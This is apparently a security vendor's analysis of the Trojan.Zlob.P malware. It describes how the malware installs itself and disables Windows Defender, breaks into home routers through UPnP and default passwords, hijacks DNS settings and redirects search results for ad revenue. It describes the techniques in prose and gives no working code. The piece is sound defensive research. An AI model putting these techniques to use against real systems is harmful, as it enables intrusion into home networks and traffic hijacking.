Zlob.P – DNS Poisoning at Home
We have seen several threats that alter DNS settings in the past; however this Zlob variant will do more than just change DNS settings. It will take advantage of popular search engines and make money for itself using ads and affiliates. In this reincarnation, Zlob has three effective states. The first state is when the Trojan infects the computer and installs itself. This is done partly by calculating a cyclical redundancy check (CRC) of when Windows was installed. The second state discovers network topology and reconfigures settings. If accessible, it will even attempt to log in to your router. The third state deals with browser traffic. The Trojan will perform a man-in-the-middle attack and change what the user sees and does, accordingly. We will take a look under the hood and analyze each of these states more closely.
State I: Installation
In order to ensure that Trojan.Zlob.P will be unique on every computer it is installed on, it uses the Windows installation date to calculate a name for itself. In fact, Trojan.Zlob.P calculates the CRC of the installation date and uses that as the name of an executable it will copy itself to, as a newly created service name, and as part of its own unique ID/name. This variant accomplishes this feat by grabbing the Windows installation date from the location in the registry as shown in the following image:
If the registry key is not accessible for any reason, then a default name will be used. If Windows Vista, Windows 7, or Windows 2k8 is found running, it will stop the WinDefend service (used to protect the computer from spyware). It will then terminate the associated process, MSASCui.exe, and set the corresponding value in the registry for HKLM\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware.
Upon reaching this point, the Trojan will then copy itself to the system directory under a different name. For default Windows XP installations this amounts to “C:\Windows\System32\[calculated CRC string].exe.” The next step for the Trojan is to create a service with the following characteristics:
Startup Type: Automatic
Image Path: %System%\%crc%.exe
Display Name: MSWU-%crc%
In this variant the only thing that is consistent is the service display name containing the string “MSWU-“. Everything else depends on properties such as the location of the system directory and the installation date.
State II: Network Discovery and Router attack
This brings us to the second state, in which DNS shenanigans make things even more interesting. The malware will attempt to prepare network connections and “phone home,” so to speak. This variant will use Simple Server Discovery Protocol (SSDP) to discover Universal Plug-and-Play (UPnP) devices on a local network.
In this case, Zlob.P is interested in router information. It will use Simple Object Access Protocol (SOAP) requests to try and glean information from the router, such as the external IP address, manufacturer, model name, model number, as well as the control URL of the uPNP device.
Now that the preliminaries are out of the way, the Trojan can continue its dirty work. It will try to reach the administrative interface of the router by attempting to connect to the following pages:
Upon a successful connection, Zlob.P will issue a SOAP request to try and punch a hole in the router’s configuration by opening a port:
Bear in mind that all of this was done assuming that the administrative panel of the router was not password protected. But what would happen if the router did have login protection? It turns out that Trojan.Zlob.P is prepared for this, just in case. The threat will use Internet Explorer and explorer.exe to try and communicate with the router using basic authorization. It will connect to the router and attempt to log in using the following combinations:
Usernames: admin, <blank>, root, Admin, 1234
Passwords: [long list of default manufacturers’ passwords]
If these attempts fail, then the Trojan has one last login trick up its sleeve. It will bank on the user being lazy and storing the passwords to avoid manually typing in the login information every time. Zlob.P will access stored Internet Explorer credentials and attempt to log in using whatever it finds.
The threat will check to see if it was successful in opening a port on the router. It will update the attacker with this information or send back the message “upnperror” if something failed. Now that a backdoor has been created with the newly opened port, the attacker can connect to it and gain access into the internal network. The data will be encrypted using Base64 and then sent off to the attacker. For a list of domains and IP addresses, please see Appendix A.
Now comes more network trouble. Zlob.P will attempt to change your network settings to point to a DNS server under the control of the attacker:
Take a look at two the DNS server addresses. Many regular users do not know what this means and will assume that they are correct because they can still access the Internet as normal. However, this means that DNS queries will go through the attacker, effectively creating a man-in-the-middle scenario without the user ever knowing about it. And, it may not be enough to fix it here. If the Trojan was successful earlier, miscellaneous router settings may have been reconfigured as well.
As a result of the attacker taking control of the infected user’s DNS settings, certain sites are no longer available, such as paretologic.com—a Microsoft certified partner. Another site that will not be accessible is eset.com, makers of Nod32 Antivirus and other anti-malware products. Curiously, another site that has been affected is one.com, a European web-hosting service established in Denmark. After infection, one.com sometimes points to an IP address associated with malware distribution located in China.
Other themed sites are also affected, such as personals and dating sites. Some go to the actual site, while others are redirected to search engines such as Google or Bing. In any case, network traffic can still be monitored. Some of the more popular sites that have been affected are passion.com, penthouse.com, friendfinder.com, and outpersonals.com. Appendix B contains more sites such as these that have had their DNS records changed. (The list is by no means complete.)
These sites point to an IP address of 18.104.22.168 (belonging to Keymachine.de), which has been associated with a referral spam bot network based in Germany, according to some authors. Their previous work includes directing traffic to affiliated porn and online drug store websites.
The malicious DNS addresses themselves belong to the UkrTeleGroup, a.k.a. Cernel. They have been linked with the Russian Business Network (RBN) and have provided Web-hosting services for cyber criminals in the past; they were associated with the Atrivo/Intercage reports from a couple of years ago, for instance.
In this variant, the more popular sites that Keymachine.de focused on were primarily dating sites. In contrast, the iNeting.net/Internet Path group did not have a clear focus. Many of the domains that iNeting.net is targeting are varied in nature. As expected, some porn sites have had their DNS records changed; however, other trendy sites such as boxtorrents.com and failblog.com have also been affected. In addition, this variant will try to capture mistyped URIs as well, such as facebbock.com, imbd.com, blospot.com, and yotube.com. Once the typo occurs, the user may either be redirected to a page with ads or continue on to the main site. It is unclear whether the real site is being sent through or if it has been modified in any way. For a partial list of domains that have been affected, please see Appendix C.
While the first state focused on installation and infecting the computer, the second state concentrated more on network functionality. It will sit between the user and the Internet as well as create a possible entry into the internal network by opening a port on the router. It will also change access to certain domains.
State III: Browser tricks
This is the stage where Zlob.P will monitor what is going on with the Web browser (specifically, Internet Explorer, Firefox, or Safari). It will monitor the following search engine sites that the user might visit:
Take a look at the bottom of the screenshot. When we hover the mouse over the link to Blossoms, we can see that it is being redirected to results5.google.com, which, incidentally, is one of the poisoned DNS entries being sent to the user. It is being served from 22.214.171.124, which is another IP address owned by iNeting.net/Internet Path. Once the user clicks on the link, the page is redirected to (in this example) search5.info.com, and not the Blossoms page clicked on earlier.
Clicking on the top link redirects the user to s.info.com, then to googleadservices.com, and then finally to OrientalTrading.com. The Blossoms link has effectively been pushed away.
One last curiosity with browser functionality involves the word “directory.” For example, trying to go to edirectory.com through the address bar redirects the user to bing.com, with edirectory.com as the top result. One would assume then, that the user would click on this link to get to the site. However, the user will actually be redirected to another site such as juggle.com, an encyclopedia and reference resource site.
While older versions of Zlob concentrated on stealing banking information, this variant incorporates several different threats into one. It has Backdoor.Trojan and Trojan.Adclicker functionality, as well as being a DNS changer for the home user. And, it does so in a way that means it can remain stealthy. Even if Zlob.P is detected and deleted, the DNS server setting could remain in place, possibly until the network is manually set or the user moves. The attacker will have access to the user’s web traffic and since the attacker is sitting in the middle, browser exploits and other potentially malicious software can be sent to the user at any time.
Symantec highly recommends that users stay diligent and monitor their network settings.
Note: Thanks to Liam OMurchu for help during the investigation of this threat.
Appendix A: Partial list of domains and IP addresses used to gather stolen data
Appendix B: Partial list of personals and dating sites
Appendix C: Partial list of sites changed by iNeting.net/Internet Path